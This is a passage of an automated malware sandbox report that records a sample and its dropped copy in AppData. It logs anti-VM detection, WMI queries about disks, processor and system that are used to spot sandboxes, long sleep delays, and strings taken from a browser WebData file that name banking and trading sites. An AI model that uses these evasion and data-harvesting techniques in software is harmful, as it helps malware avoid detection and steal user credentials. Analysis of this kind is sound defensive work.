Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LjlEiSlJe.exe PID: 7584, type: MEMORYSTR

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 2650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 2700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 2650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 4E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 5E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 5F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 6F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 9BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: ABF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Memory allocated: 4E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 28E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 4E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 5E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 5FC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 6FC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 9B30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: AB30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Memory allocated: 4E90000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5667	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1076	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6113	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1302	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Window / User API: foregroundWindowGot 1772	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Window / User API: foregroundWindowGot 1774

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe TID: 5908	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe TID: 7608	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: WebData.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WebData.14.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: WebData.14.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
